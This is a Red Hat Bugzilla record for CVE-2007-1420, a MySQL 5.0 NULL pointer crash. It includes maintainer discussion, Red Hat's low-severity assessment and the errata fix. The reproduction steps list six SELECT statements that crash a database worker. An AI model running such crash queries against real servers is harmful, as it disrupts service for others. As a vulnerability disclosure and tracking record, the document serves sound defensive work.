Bug 232603 (CVE-2007-1420) - CVE-2007-1420 Single MySQL worker can be crashed (NULL deref) with certain SELECT statements
Summary: CVE-2007-1420 Single MySQL worker can be crashed (NULL deref) with certain SE...
Keywords:
Status: CLOSED ERRATA
Alias: CVE-2007-1420
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: All
OS: Linux
low
low
Target Milestone: ---
Assignee: Tom Lane
QA Contact: David Lawrence
URL: http://www.securityfocus.com/bid/2290...
Whiteboard:
Depends On:
Blocks:
TreeView+ depends on / blocked
 
Reported: 2007-03-16 12:16 UTC by Red Hat Product Security
Modified: 2019-09-29 12:20 UTC (History)
3 users (show)

Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Clone Of:
Environment:
Last Closed: 2008-07-25 08:14:03 UTC


Attachments (Terms of Use)


Links
System ID Private Priority Status Summary Last Updated
Red Hat Product Errata RHSA-2008:0364 0 normal SHIPPED_LIVE Low: mysql security and bug fix update 2008-05-20 12:44:41 UTC

Description Lubomir Kundrak 2007-03-16 12:16:35 UTC
Description of problem:

A NULL pointer dereference occurs after issuing the SELECT statements
below. Security impact is very limited, as only one worker crashes, leaving
the server running and ready for service. Additionally, an attacker must be
authenticated and permitted to execute arbitrary SELECT statements.

Version-Release number of selected component (if applicable):

Does not affect MySQL 4.

How reproducible:

Always, by an authenticated user.

Steps to Reproduce:

SELECT ASCII((SELECT table_name FROM information_schema.columns ORDER BY 1));
SELECT TRIM(LEADING FROM (SELECT table_name FROM information_schema.columns
ORDER BY 1));
SELECT SUBSTR((SELECT table_name FROM information_schema.tables ORDER BY 1),1,1);
SELECT UPPER((SELECT table_name FROM information_schema.tables ORDER BY 1));
SELECT RTRIM((SELECT table_name FROM information_schema.tables ORDER BY 1));
SELECT RPAD((SELECT table_name FROM information_schema.tables ORDER BY 1),1,'lol')
  
Actual results:

The session closes prematurely, fault message in the log file.

Expected results:

I expected it to crash. I like this section of a bug report.

Comment 1 Tom Lane 2007-03-16 15:23:26 UTC
The mysql 5.0.36/37 release notes mention something like twenty different
crashing bugs fixed.  What's your rationale for harping on this particular one?

Comment 2 Lubomir Kundrak 2007-03-19 09:16:27 UTC
tgl: a CVE. pardon me for forgetting to mention it in the Summary.

Comment 7 Mark J. Cox 2007-08-21 10:55:38 UTC
moving to security response parent bug, we only create tracking bugs once it has
been decided we will fix this issue in a particular release.

Comment 9 Mark J. Cox 2007-09-10 08:21:39 UTC
        Red Hat does not consider this to be a security issue. It requires an
        attacker to be authenticated and after triggering the crash the
        database server will restart and continue to service requests.


Comment 11 Red Hat Product Security 2008-07-25 08:14:03 UTC
This issue was addressed in:

Red Hat Enterprise Linux:
  http://rhn.redhat.com/errata/RHSA-2008-0364.html



Comment 12 Red Hat Bugzilla 2009-10-23 19:07:05 UTC
Reporter changed to security-response-team@redhat.com by request of Jay Turner.


Note You need to log in before you can comment on or make changes to this bug.